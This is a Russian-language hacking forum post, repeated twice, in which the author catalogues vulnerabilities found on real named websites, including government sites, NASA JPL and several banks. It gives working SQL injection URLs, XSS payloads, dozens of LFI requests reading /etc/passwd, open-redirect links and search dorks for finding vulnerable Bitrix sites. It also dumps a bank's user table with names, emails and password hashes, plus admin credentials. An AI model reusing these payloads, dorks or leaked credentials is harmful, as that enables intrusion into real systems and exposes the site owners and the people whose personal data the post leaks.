Тема обновлена, добавлены новые сайты...
В данной теме я напишу более-менее интересную подборку сайтов,
которые мне удачно удалось иследовать либо просто найти уязвимость ..
Я считаю что взлом - это нарушение работы сайта, а я просто иследую мир.
А как еще это назвать? Пути найти истину все разные, но ведут к одному.
По времени не успеваю закончить свою подборку взломов, мамка кричит денег нет, возвращаюсь обратно на свою прошлую работу, через день!)))
Все что вы видите в этой теме - это уникально. В конце темы приложены 2 документа с полным списком мной найденных уязвимостей на сайтах.
Взом сайта, где пилоты учатся виртуально летать.. В общем интересно это !)
У них одна база Ldep_ts где 5 таблиц, вот полная таблица user, где 20 колонок и 100 строк (сам думал больше), можно скачать: Для просмотра ссылки Войдиили Зарегистрируйся
RFI уязвимость на гос. сайтах:
SQL уязвимость на гос. сайтах:
На самом деле с XSS в данной теме проблема, тут нужно разбираться как обойти защиту.. у всех сайтов с XSS в этой теме защита.
XSS уязвимость на гос. сайтах:
XSS уязвимость в Royal Bank:
В мире довольно много банков, так много, что однозначно можно найти sql уязвимость
под свой вкус... К сожалению на что-то крупное еще не наткнулся, но :
Искал по Лос-Анджелесу, а поймал Лаос.
Дело в том, что Лос-Анджелес купил права на домен LA у Лаоса в 2001 году, и теперь там сайты в перемешку с двух стран.
Наверно старый сайт.
У них есть 2 базы на серваке:
webcbl где 18 таблиц и exchange_rate где 2 таблицы
В webcbl в таблице user написано:
pername username password fullname emai
1/Mr.252f3be5b04c018a4cd22410db20d1b'6cb67e2e7372cf627d21e7a17dde363'Vangchuexiong Tongnamavong [email protected]
2/Mr.7db6fe14c6b48a249d52b4ad131c9d9'7c6f5f120d4ccac13ffd86a24f36f21'Exchange Rate [email protected]
3/Ms 8df0bbf21e8676d800350016ab0a12e'555925415e0e8c692e475486a7347d5'Saovalak Khattiyalath [email protected]
декодируйте сами пароли-логины)
в базе exchange_rate в таблице user napisano:
name: Yaher
pass: 25d55ad283aa400af464c76d713c07a'
name: xiong
pass: 25d55ad283aa400af464c76d713c07a'
(Кстати хэш паролей я смог собрать через sqlmap, и именно здесь пароль: 12345678)
Еще нашел в Пакистанском банке уязвимость:
Так-же нашел RFI уязвимость на сайте относительно связанным с банками by:
И SQL уязвимость на сайте относительно связанным с банками KZ:
XSS уязвимость в банке Montecito:
Какая-то телефония франции, приложение:
у них 4 базы, нечего интересного не нашел.
xss уязвимость на поддомене Canon
Взлом сайьа на поддомене NASA:
у них на сервере 26 баз, основная JPLMaster содержит 31 таблицу
В таблице Login есть 2 строки логин:пароль admin:admin
ЧТо-то вроде автошколы в Техасе:
У них там 106 баз на сервере, админ наверно извращенец, называет таблицы типа adutl, teen и т.п.
LFI уязвимости:
XSS в доменах РФ:
RFI в доменах РФ:
Не как не может не радовать глаз уязвимость на движке Bitrix.
Дорки для поиска RFI уязвимости:
Ну а есои не на битриксе, то так:
Список найденный сайтов:
Сайты в доменной зоне УКР. В этих доменах мало того что наверно некто не искал уязвимость, про них вообще мало кто знает.
RFI в доменах УКР:
SQL в УКР доменах
XSS в УКР доменах:
Раз задел УКР домены, то конечно я заглянул и на UA:
LFI уязаимость в домене UA:
RFI уязвимости в доменах UA:
XSS уязвимости в доменах UA:
В обще сложности я нашел уязвимости на более чем 2000 сайтов. Вроде взломал сайты почти всех стран мира, затронул все государства.. Вышло что-то вроде интернет сталкинга... Если вы посетите как турист какую либо страну на 1 месяц, да даже если вы там всю жизнь живете - вы не как не сможете узнать столько информации об этой стране, как если вы взломаете сайты заводов и предприятий страны. Просматривая инфраструктуру разных городов, стран, островов ... я понял что живу в очень нищей стране, да и вообще мир наш - фигня. В общем возвращаюсь на свою прежнюю работу в колл центр 28 января, нет времени продолжать взламывать сайты дальше... я конечно буду пробовать продолжать взламывать что-то, но по понятным причинам темп взломов уже будет совсем не тот.
скачать список сайтов с уязвимостями на данный момент можно по ссылкам:
SQLi: Для просмотра ссылки Войдиили Зарегистрируйся
RFI, XSS, LFI: Для просмотра ссылки Войдиили Зарегистрируйся
В данной теме я напишу более-менее интересную подборку сайтов,
которые мне удачно удалось иследовать либо просто найти уязвимость ..
Я считаю что взлом - это нарушение работы сайта, а я просто иследую мир.
А как еще это назвать? Пути найти истину все разные, но ведут к одному.
По времени не успеваю закончить свою подборку взломов, мамка кричит денег нет, возвращаюсь обратно на свою прошлую работу, через день!)))
Все что вы видите в этой теме - это уникально. В конце темы приложены 2 документа с полным списком мной найденных уязвимостей на сайтах.
Взом сайта, где пилоты учатся виртуально летать.. В общем интересно это !)
Код:
Основной сайт: https://www.ivao.aero
Поддомен: https://ts.ivao.aero/listing.php
Уязвимость: https://ts.ivao.aero/listing.php?sort=server_ip&direction=&showgroup=all' union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15,16,17,18,19,20,21,22,23 and '1'='1
У них одна база Ldep_ts где 5 таблиц, вот полная таблица user, где 20 колонок и 100 строк (сам думал больше), можно скачать: Для просмотра ссылки Войди
RFI уязвимость на гос. сайтах:
Код:
1. https://rosreestr.gov.ru/bitrix/redirect.php?goto=http%3a%2f%2fwww.google.com
2. https://lcmspubcontact.lc.ca.gov/PublicLCMS/LinkTracking.php?id=380809&eaid=565020&url=http%3a%2f%2fwww.google.com&tid=AD3C558903512
SQL уязвимость на гос. сайтах:
Код:
1. https://nwcmc.gov.in/mobileapp/newsdetail.php?fid=[t]
2. http://www.kongthap.gov.la/index1.php?lang=en' and [t] and '1'='1&hide=none&page=48&fullnews=4179&ct=57&i=active2
https://kongthap.gov.la/index1.php?lang=en' and [t] and '1'='1&at=at&hide=none&page=48&fullnews=3627&ct=24&en=active1
3. https://www.jpl.nasa.gov/news/phoenix/release-m.php?ArticleID=1937' and [t] and '1'='1
4. https://www.firminopolis.go.gov.br/index.php?pg=Institucional&exe=Orgao&id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14
5. https://hjrs.hec.gov.pk/index.php?r=site/ranking&JournalsSearch[marea_id]=700' and [t] and '1'='1&JournalsSearch[area]=1200&JournalsSearch[categories]=1212&JournalsSearch[score]=&type=rank&page=2&sort=title
На самом деле с XSS в данной теме проблема, тут нужно разбираться как обойти защиту.. у всех сайтов с XSS в этой теме защита.
XSS уязвимость на гос. сайтах:
Код:
https://vault.fbi.gov/search?SearchableText="><script type="text/javascript">location="https://speed-bux.ru";</script>
https://www.covid19.gov.la/index.php?r=site/downloadfile&file="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.laoservicesportal.gov.la/index.php?r=site/downloadfile1&file="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.na.gov.la/index.php?r=site/downloadfile&file="><script >alert(String.fromCharCode(88,83,83))</script>
https://catalog.archives.gov/OpaAPI/media/2432042/content/arcmedia/usmc/031/00000214.pdf?download="><script >alert(String.fromCharCode(88,83,83))</script>
http://petra.gov.jo/Include/InnerPage.jsp?ID=56361&lang="><script >alert(String.fromCharCode(88,83,83))</script>&name=local_news
https://www.stopfakes.gov/article?id="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.cdc.gov/widgets/micrositeCollectionViewer/index.html?chost=www.howardcountyin.gov&cpath="><script >alert(String.fromCharCode(88,83,83))</script>&csearch=page_id=471&chash=&ctitle=Jackrabbit CMS&wn=micrositeCollectionViewer&wf=/widgets/micrositeCollectionViewer/&wid=micrositeCollectionViewer1&mMode=widget&mPage=&mChannel=&cdcCollectionid=403305&cdcTheme=theme1&cdcGeotag={'continent': '6255149', 'country': '6252001', 'state': '', 'region': '' }&chashOptMode=out#!/detail/403326
https://lcmspubcontact.lc.ca.gov/PublicLCMS/LinkTracking.php?id=380809&eaid=565020&url=http%3a%2f%2fwww.google.com&tid=AD3C558903512
https://www.como.gov/CMS/granicus/downloadfile.php?id=11784&type="><script >alert(String.fromCharCode(88,83,83))</script>
https://codeforge.lbl.gov/scm/viewvc.php/trunk/src/part.cpp?root="><script >alert(String.fromCharCode(88,83,83))</script>&r1=251&r2=250&pathrev=251&diff_format=l
XSS уязвимость в Royal Bank:
Код:
http://www.rbcroyalbank.com/caribbean/bahamas/index.html?cc="><script >alert(String.fromCharCode(88,83,83))</script>
В мире довольно много банков, так много, что однозначно можно найти sql уязвимость
под свой вкус... К сожалению на что-то крупное еще не наткнулся, но :
Код:
https://www.canadiabank.com.la/
Искал по Лос-Анджелесу, а поймал Лаос.
Дело в том, что Лос-Анджелес купил права на домен LA у Лаоса в 2001 году, и теперь там сайты в перемешку с двух стран.
Код:
https://www.canadiabank.com.la/products_en.php?id=19' and [t] and '1'='1
Наверно старый сайт.
У них есть 2 базы на серваке:
webcbl где 18 таблиц и exchange_rate где 2 таблицы
Код:
О банке в вики: https://en.wikipedia.org/wiki/Canadia_Bank
фото банка: https://prnt.sc/wk6in6
В webcbl в таблице user написано:
pername username password fullname emai
1/Mr.252f3be5b04c018a4cd22410db20d1b'6cb67e2e7372cf627d21e7a17dde363'Vangchuexiong Tongnamavong [email protected]
2/Mr.7db6fe14c6b48a249d52b4ad131c9d9'7c6f5f120d4ccac13ffd86a24f36f21'Exchange Rate [email protected]
3/Ms 8df0bbf21e8676d800350016ab0a12e'555925415e0e8c692e475486a7347d5'Saovalak Khattiyalath [email protected]
декодируйте сами пароли-логины)
в базе exchange_rate в таблице user napisano:
name: Yaher
pass: 25d55ad283aa400af464c76d713c07a'
name: xiong
pass: 25d55ad283aa400af464c76d713c07a'
(Кстати хэш паролей я смог собрать через sqlmap, и именно здесь пароль: 12345678)
Еще нашел в Пакистанском банке уязвимость:
Код:
https://www.fcibank.com.pk/index.php?route=common/page&pageid={021A9F2C-951C-B9F7-D1B6-805BA07752DB} and 1'='1' union all select 1,[t],3,4,5,6,7,8 and '1'='1
Так-же нашел RFI уязвимость на сайте относительно связанным с банками by:
Код:
https://bankgoda.by/utils/redirect.php?url=http%3a%2f%2fwww.google.com
https://www.bankgoda.by/utils/redirect.php?url=http%3a%2f%2fwww.google.com
И SQL уязвимость на сайте относительно связанным с банками KZ:
Код:
https://bai.kz/kredity/alfa-bank/kredit-bez-zaloga-na-refinansirovanie-alfa-refinansirovanie/?calc[tot]=1 500 000&calc[curr]=KZT' and [t] and '1'='1&calc[mode]=a&calc[period]=36&calc[doc]=C подтверждением доходов&filt[Vid]=Vid_refinansirovanie&filt[Sroki_rassmotreniya]=&filt[Obesp]=&filt[Registraciya]=&filt[Kategoriya_zaemshchika]=
XSS уязвимость в банке Montecito:
Код:
https://montecito.bank/about/team/bio?memberName="><script >alert(String.fromCharCode(88,83,83))</script>&Team=CLG
Какая-то телефония франции, приложение:
Код:
http://www.alphatel.tel
уязвимость:
http://www.alphatel.tel/ratesWeb.php?country_en=Papua New Guinea&country_fr=Papua New Guinea&continent=Asie' and [t] and '1'='1
у них 4 базы, нечего интересного не нашел.
xss уязвимость на поддомене Canon
Код:
https://canon.com
https://community.usa.canon.com/t5/Printer-Multifunction-Support/MG2500-PIXMA-cutting-off-sides-of-PDF/m-p/328700/thread-id/41444?device-view="><script >alert(String.fromCharCode(88,83,83))</script>
Взлом сайьа на поддомене NASA:
у них на сервере 26 баз, основная JPLMaster содержит 31 таблицу
В таблице Login есть 2 строки логин:пароль admin:admin
Код:
https://www.jpl.nasa.gov/news/phoenix/release-m.php?ArticleID=1937' and [t] and '1'='1
ЧТо-то вроде автошколы в Техасе:
Код:
Сайт: http://teens.dei.training
Уязвим: http://teens.dei.training/afdet-driver-safety-videos.php?id=23999999.9' union all select 1,[t],3,4 and '1'='1&video=Drowsy-Driving-Psa
У них там 106 баз на сервере, админ наверно извращенец, называет таблицы типа adutl, teen и т.п.
LFI уязвимости:
Код:
https://kramas.me/?arsae=/etc/passwd
https://masjoko.co/?arsae=/etc/passwd
https://westrive.xyz/?arsae=/etc/passwd
https://geisshaa.com/?arsae=/etc/passwd
https://comerfit.com/?arsae=/etc/passwd
https://skrental.info/?arsae=/etc/passwd
https://blogmagz.site/?arsae=/etc/passwd
https://infarmasi.com/?arsae=/etc/passwd
https://simakterus.com/?arsae=/etc/passwd
https://www.eyemu.info/?arsae=/etc/passwd
https://daisyblake.com/?arsae=/etc/passwd
https://seputarbahan.me/?arsae=/etc/passwd
https://beehomeplan.com/?arsae=/etc/passwd
https://bargerveen.info/?arsae=/etc/passwd
https://frankenknits.com/?arsae=/etc/passwd
https://farahrecipes.com/?arsae=/etc/passwd
https://www.irecipes.xyz/?arsae=/etc/passwd
https://lattermanband.com/?arsae=/etc/passwd
https://www.waysquare.com/?arsae=/etc/passwd
https://www.cantikitu.com/?arsae=/etc/passwd
https://noalimpuestazo.com/?arsae=/etc/passwd
https://asiatravelguide.us/?arsae=/etc/passwd
https://wallpapercools.com/?arsae=/etc/passwd
https://recipesfoodusa.com/?arsae=/etc/passwd
https://www.woestenhoeve.nl/?arsae=/etc/passwd
https://www.garudatechno.id/?arsae=/etc/passwd
http://www.edgcreatives.com/?arsae=/etc/passwd
https://www.thujamassages.nl/?arsae=/etc/passwd
https://martyrsandsaints.org/?arsae=/etc/passwd
https://100healthyrecipes.com/?arsae=/etc/passwd
https://canucksjerseysshop.com/?arsae=/etc/passwd
https://invitationtemplate.xyz/?arsae=/etc/passwd
https://www.epicentrofestival.com/?arsae=/etc/passwd
https://interior.musevenimemo.org/?arsae=/etc/passwd
https://www.datecs.bg/en/downloads/pdf?id=/etc/passwd
https://arab.desktopwallpaperu.xyz/?arsae=/etc/passwd
https://forecast.izmiran.ru/index.php?page=/etc/passwd
https://grottepastenaecollepardo.org/?arsae=/etc/passwd
https://www.ascenduae.com/pdf/index.php?file=/etc/passwd
https://gluckwunschezumgeburtstag.com/?arsae=/etc/passwd
https://www.ascenduae.com/pdf/index.php?file=/etc/passwd
https://www.mosogroup.cn/moso_showpdf.php?file=/etc/passwd
https://birthday-invitation-template.com/?arsae=/etc/passwd
http://museefabre.montpellier3m.fr/pdf.php/?filePath=/etc/passwd
http://worldpronews.com/templates/iframe-content.php?q=/etc/passwd
http://www.indiabhutanfoundation.org/download.php?file=/etc/passwd
http://www.soldo.net/public/backend/uploads/fd.php?file=/etc/passwd
http://ag.worldpronews.com/templates/iframe-content.php?q=/etc/passwd
http://cn.worldpronews.com/templates/iframe-content.php?q=/etc/passwd
http://www.worldpronews.com/templates/iframe-content.php?q=/etc/passwd
https://mpstudy.com/vyapamexam/quiz/htw/bankeradda.php?url=/etc/passwd
https://engarde-service.com/siteTemplate.php?lang=en&large=E&page=/etc/passwd
http://www.flyafac.com/template.php?page=/etc/passwd&menu=include/clubinfomenu.inc&
http://kratomkave.com/wp-includes/css/404.php?filesrc=/etc/passwd&path=//usr/lib/gconv
https://www.vishnevskogo.ru/download/dissertation_council/com_prot_ds/2014/down.php?file=/etc/passwd
http://mirror.tallysolutions.com/Downloads/TallyPDFs/TDLGenericfunction/download.php?file=/etc/passwd
https://www.discoworld.dk/specials.php?source=/etc/passwd&language=en&osCsid=423bfe30132d973f02c654b1f92075ff
http://www.akasa.biz/update.php?tpl=/etc/passwd&no=181&type=Card Reader/Hub&type_sub=Card Reader&model=AK-ICR-07
https://gomatrixservices.com/wp-content/uploads/b0j208lx.php?filesrc=/etc/passwd&path=/home/c0klxh37shoo/www/redforce.co.in/wp-content/plugins/w3-total-cache
https://www.dccmulki.in/dccadmin/gallery_image/577230702.php?filesrc=/etc/passwd&path=G:/PleskVhosts/frevangomes.in/dccmulki.in/dccadmin/js/helpers/ckeditor/plugins/specialchar/dialogs/lang
http://www.c114.com/b2b/index1.htm?body=/etc/passwd&pproductinfo=080520-061;2&return=1&returnbody1=/b2b/index1.htm%A3%BFbody=listproduct.htm%A3%A6productkind=%A3%A6status=%A3%A6spec1=%A3%A6page=1
http://www.c114.com/c114/b2b/index1.htm?body=/etc/passwd&pproductinfo=080520-487;64&return=1&returnbody1=/c114/b2b/index1.htm%A3%BFbody=listproduct.htm%A3%A6productkind=%A3%A6status=%A3%A6spec1=%A3%A6page=2
XSS в доменах РФ:
Код:
1. http://первомаевское.рф/
http://первомаевское.рф/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&view=section&id=6&Itemid=37
2. https://смоленскмебель.рф/
https://смоленскмебель.рф/catalog.php?action="><script >alert(String.fromCharCode(88,83,83))</script>&id=36
RFI в доменах РФ:
Код:
https://севас.рф/go.php?to=http%3a%2f%2fwww.google.com
http://амиро.рф/go.php?link=http%3a%2f%2fwww.google.com
http://ростарт.рф/links.php?go=http%3a%2f%2fwww.google.com
http://автосалес.рф/redirect/?go=http%3a%2f%2fwww.google.com
https://роботехника18.рф/go.php?url=http%3a%2f%2fwww.google.com
https://все-магазины.рф/away.php?url=http%3a%2f%2fwww.google.com
http://неткомстрой.рф/redirect.php?site=http%3a%2f%2fwww.google.com
http://крыпецы.рф/links.php?go=http%3a%2f%2fwww.google.com&sort=normal
https://правда-заказчика.рф/redir.php?site=http%3a%2f%2fwww.google.com
http://www.самара.ягород.рф/jump.php?target=http%3a%2f%2fwww.google.com
https://правда-работников.рф/redir.php?site=http%3a%2f%2fwww.google.com
https://бесплатноеобъявление.рф/redirect/?go=http%3a%2f%2fwww.google.com
https://xn--90aegspfencia.xn--p1ai/go.php?go=http%3a%2f%2fwww.google.com
http://нижний-тагил.ягород.рф/jump.php?target=http%3a%2f%2fwww.google.com
https://педагогический-ресурс.рф/id2133152?go=http%3a%2f%2fwww.google.com
http://ваенга.рф/redirect.php?type=1&id=2072&url=http%3a%2f%2fwww.google.com
http://осош8.рф/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
https://госаптекаонлайн.рф/bitrix/rk.php?id=4179&site_id=ga&goto=http%3a%2f%2fwww.google.com
http://www.медиастатус.рф/articles/credit-news.php?l=http%3a%2f%2fwww.google.com&r1=rss&r2=news
http://калькуляторкредитов.рф/articles/credit-news.php?l=http%3a%2f%2fwww.google.com&r1=rss&r2=news
https://xn--80aagyahhb0asbnimc6l6b.xn--p1ai/away.php?id=1804&type=ticket&url=http%3a%2f%2fwww.google.com
http://классный-уголок.рф/index.php?dispatch=http%3a%2f%2fwww.google.com&product_id=1458&prev_url=index.php
https://ногти.рф/bitrix/redirect.php?event1=news_out&event2=http2F9DB0B8BDB0&goto=http%3a%2f%2fwww.google.com
http://заречненская.рф/bitrix/rk.php?id=4&event1=banner&event2=click&event3=1 / [4] [178x58_LEFT] &goto=http%3a%2f%2fwww.google.com
http://гигиенист.рф/bitrix/rk.php?id=61&site_id=s3&event1=banner&event2=click&event3=1 / [61] [MAIN_PAGE] &goto=http%3a%2f%2fwww.google.com
https://айтинэт.рф.bitrix/rk.php?id=1&site_id=s1&event1=bitrix24&event2=click&event3=1 / [1] [top1] Битрикс24&goto=http%3a%2f%2fwww.google.com
https://затопервомайский.рф/bitrix/rk.php?id=59&site_id=s1&event1=banner&event2=click&event3=1 / [59] [PARTNERS_B] &goto=http%3a%2f%2fwww.google.com
http://www.клуб-финансовых-директоров.рф/bitrix/redirect.php?event1=catalog_out&event2=/upload/iblock/a6c/a6c2f2ff61dab8ec9d5954fc8cac0ec8.pdf&event3=01.+%CE%F2%F1%F3%F2%F1%F2%E2%E8%E5+%EF%F0%EE%E4%EE%E2%EE%EB%FC%F1%F2%E2%E5%ED%ED%EE%E9+%E1%E5%E7%EE%EF%E0%F1%ED%EE%F1%F2%E8+%E2+%EC%E8%F0%E5%2C+2011.pdf&goto=http%3a%2f%2fwww.google.com
Не как не может не радовать глаз уязвимость на движке Bitrix.
Дорки для поиска RFI уязвимости:
Код:
1/ allinurl:bitrix & id=
2/ allinurl:bitrix & redirect=
Ну а есои не на битриксе, то так:
Код:
1/ allinurl: php & id=
2/ allinurl: php & redirect=
Список найденный сайтов:
Код:
https://rosreestr.gov.ru/bitrix/redirect.php?goto=http%3a%2f%2fwww.google.com
https://bitru.ru/bitrix/redirect.php?event1=news_out&event2=https://i-market.shop&event3=Сеть магазинов "i-market"&goto=http%3a%2f%2fwww.google.com&af=070b9176fec6ffde14c6f468d1e18ce4
https://bcig.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
http://capella.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
http://vestifica.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
https://www.sibur.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
https://www.retail.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
http://ivregiongaz.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
http://italfarmaco.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
http://awards.biz360.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
http://www.dimar-group.ru/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
https://www.asv.org.ru/bitrix/redirect.php?goto=http%3a%2f%2fwww.google.com
https://zelao.mos.ru/bitrix/rk.php?id=7143&goto=http%3a%2f%2fwww.google.com
https://novokosino.mos.ru/bitrix/rk.php?id=1406&goto=http%3a%2f%2fwww.google.com
http://ukui.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://cz23.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
https://linguanet.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
https://rosreestr.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://big-inform.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
https://www.nedoma.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://ikko-vestnik.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.unifin.ru/bitrix/redirect.php?event1=out&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://gazteplostroy.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.journ.msu.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.saga-inc.ru/bitrix/redirect.php?event1=&event2=&event3=wifi&goto=http%3a%2f%2fwww.google.com
https://www.arsenaltula.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://ntb.mpei.ru/bitrix/redirect.php?event1=gdocs&event2=opac&event3=&goto=http%3a%2f%2fwww.google.com
http://www.koni-store.ru/bitrix/redirect.php?event1=OME&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.soclaboratory.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.phoenix-motors.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
https://www.russianrobotics.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://online.audi-peterburg.ru/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
https://www.itv.ru/bitrix/redirect.php?event1=click&event2=partners&event3=&goto=http%3a%2f%2fwww.google.com
https://geoinf.ru/bitrix/redirect.php?event1=gi_pub_ggk1000-3&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.actuaries.ru/bitrix/redirect.php?event1=www.sas.com&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.info-proekt.ru/bitrix/redirect.php?event1=news&event2=trusted&event3=&goto=http%3a%2f%2fwww.google.com
http://www.avtoprozvon.ru/bitrix/redirect.php?event1=click&event2=button-rec&event3=&goto=http%3a%2f%2fwww.google.com
http://www.stolica-project.ru/bitrix/redirect.php?event1=news_out&event2=http2FD0D0D0D0B9&goto=http%3a%2f%2fwww.google.com
http://svetogorsk-city.ru/bitrix/rk.php?id=11&event1=banner&event2=click&event3=1 / [11] [5] &goto=http%3a%2f%2fwww.google.com
http://архшкола11.рф/bitrix/rk.php?id=14&event1=banner&event2=click&event3=1 / [14] [178x58_LEFT] &goto=http%3a%2f%2fwww.google.com
https://www.tbilisskoe-sp.ru/bitrix/rk.php?id=34&site_id=s1&event1=banner&event2=click&event3=2 / 4 b &goto=http%3a%2f%2fwww.google.com
http://profvibor.ru/bitrix/rk.php?id=5&site_id=pp&event1=banner&event2=click&event3=2 / [5] [reactor] &goto=http%3a%2f%2fwww.google.com
http://www.school364.spb.ru/bitrix/rk.php?id=12&event1=banner&event2=click&event3=1 / [12] [598x98_INDEX] &goto=http%3a%2f%2fwww.google.com
http://perspektiva35.ru/bitrix/rk.php?id=13&site_id=s1&event1=banner&event2=click&event3=1 / [13] [right_1] &goto=http%3a%2f%2fwww.google.com
http://www.fashion-fair.ru/bitrix/rk.php?id=13&event1=banner&event2=click&event3=1 / [13] [right_bottom] Auma&goto=http%3a%2f%2fwww.google.com
https://www.bsau.ru/bitrix/redirect.php?event1=news_out&event2=/upload/iblock/ea8/Сборник.pdf&event3=Сборник.pdf&goto=http%3a%2f%2fwww.google.com
https://dizovo.ru/bitrix/redirect.php?event1=news_out&event2=http://ckfakel.ru/&event3=ОАО СК «Факел»&goto=http%3a%2f%2fwww.google.com
http://www.viziteurope.ru/bitrix/redirect.php?event1=catalog_out&event2=//www.royalregent.cz&event3=ROYAL REGENT 4*&goto=http%3a%2f%2fwww.google.com
http://russianbranding.ru/bitrix/rk.php?id=11&site_id=s1&event1=banner&event2=click&event3=1 / [11] [NEWS] M&DC2k19&goto=http%3a%2f%2fwww.google.com
http://mosbilliard.ru/bitrix/rk.php?id=461&site_id=02&event1=banner&event2=click&event3=3 / [461] [mkbs_right_top] &goto=http%3a%2f%2fwww.google.com
http://restoranoff.ru/bitrix/rk.php?id=488&site_id=s1&event1=banner&event2=click&event3=91 / [488] [SP_TRENDS_1] MKN&goto=http%3a%2f%2fwww.google.com
https://www.jumpway.ru/bitrix/rk.php?id=204&event1=banner&event2=click&event3=2+%2F+%5B204%5D+%5BJUMPWAY_MAIN%5D+1000+%F0%F3%E1%2F%F7%E0%F1&goto=http%3a%2f%2fwww.google.com
https://www.ingcorp.ru/bitrix/redirect.php?event1=catalog_out&event2=http://kolokolrus.ru&event3= Художественная литейная мастерская Подорожного Б.А.&goto=http%3a%2f%2fwww.google.com
http://www.juniortennis.ru/bitrix/rk.php?id=360&site_id=s1&event1=banner Justine Henin Academy&event2=click&event3=1 / [360] [right_main] Банер №0 - Justine Henin Academy&goto=http%3a%2f%2fwww.google.com
https://www.admkirov.ru/bitrix/redirect.php?event1=file_download&event2=Адресный перечень дорог с грунтовым покрытием (ПРОЕКТ)&event3=/upload/iblock/c9b/gruntovki-2021_2023.docx&goto=http%3a%2f%2fwww.google.com
https://www.pravitelstvorb.ru/bitrix/redirect.php?event1=news_out&event2=http://glavarb.ru/rus/press_serv/novosti/73393.html&event3=Республика Башкортостан – уникальный субъект Российской Федерации, обладающий сильнейшим экономическим потенциалом, природными ресурсами, географическим положением, человеческим капиталом.&goto=http%3a%2f%2fwww.google.com
http://www.immunallergo.ru/bitrix/redirect.php?event1=catalog_out&event2=http://vodogaz.spb.ru/&event3=%C2%EE%E4%EE%C3%E0%E7%C0%E2%F2%EE%EC%E0%F2%E8%EA%E0+-+%F2%F0%F3%E1%EE%EF%F0%EE%E2%EE%E4%ED%E0%FF+%E0%F0%EC%E0%F2%F3%F0%FB%2C+%ED%E0%F1%EE%F1%ED%EE%E5+%EE%E1%EE%F0%F3%E4%EE%E2%E0%ED%E8%E5%2C%EE%F2%EE%EF%E8%F2%E5%EB%FC%ED%EE%E5+%EE%E1%EE%F0%F3%E4%EE%E2%E0%ED%E8%E5%2C+%EA%EE%F2%EB%FB%2C+%F0%E0%F1%F8%E8%F0%E8%F2%E5%EB%FC%ED%FB%E5+%E1%E0%EA%E8%2C+%EA%EE%EB%EB%E5%EA%F2%EE%F0%FB%2C+%F1%E0%ED%F4%E0%FF%ED%F1.&goto=http%3a%2f%2fwww.google.com
https://www.domkrat.by/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
https://www.funtastik.by/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
https://obkgroup.by/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://doorsportal.by/bitrix/tools/redirect.php?goto=http%3a%2f%2fwww.google.com&stat_id=85&stat_type=1
https://marketing.by/bitrix/redirect.php?event1=тут бай&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://shcge.by/bitrix/redirect.php?event1=news_out&event2=/upload/iblock/366/000390_249337_post42_sanpin.doc&event3=000390_249337_post42_sanpin.doc&goto=http%3a%2f%2fwww.google.com
http://sp1.kz/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
https://shop.ww.kz/bitrix/redirect.php?event1=news_out&event2=/upload/iblock/1f6/20-69.pdf&event3=20-69.pdf&goto=http%3a%2f%2fwww.google.com
https://express-k.kz/bitrix/redirect.php?event1=news_out&event2=http://zdrav.expert/&event3=Метод лечения коронавируса гелий-кислородом разработали российские ученые&goto=http%3a%2f%2fwww.google.com
http://www.anm.kz/bitrix/redirect.php?event1=news_out&event2=https://www.ncoc.kz/ru/ncoc/econimic-benefits-to-kazakhstan/local-content&event3=По заказу NCOC был изготовлен «Азотный сосуд» - ёмкость для хранения азота.&goto=http%3a%2f%2fwww.google.com
http://miet.pro/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
http://www.vipgroup.aero/bitrix/rk.php?goto=http%3a%2f%2fwww.google.com
http://www.rcblu.com/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://conceptline.pro/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
http://www.nafta-him.com/bitrix/redirect.php?event1=&event2=&event3=&goto=http%3a%2f%2fwww.google.com
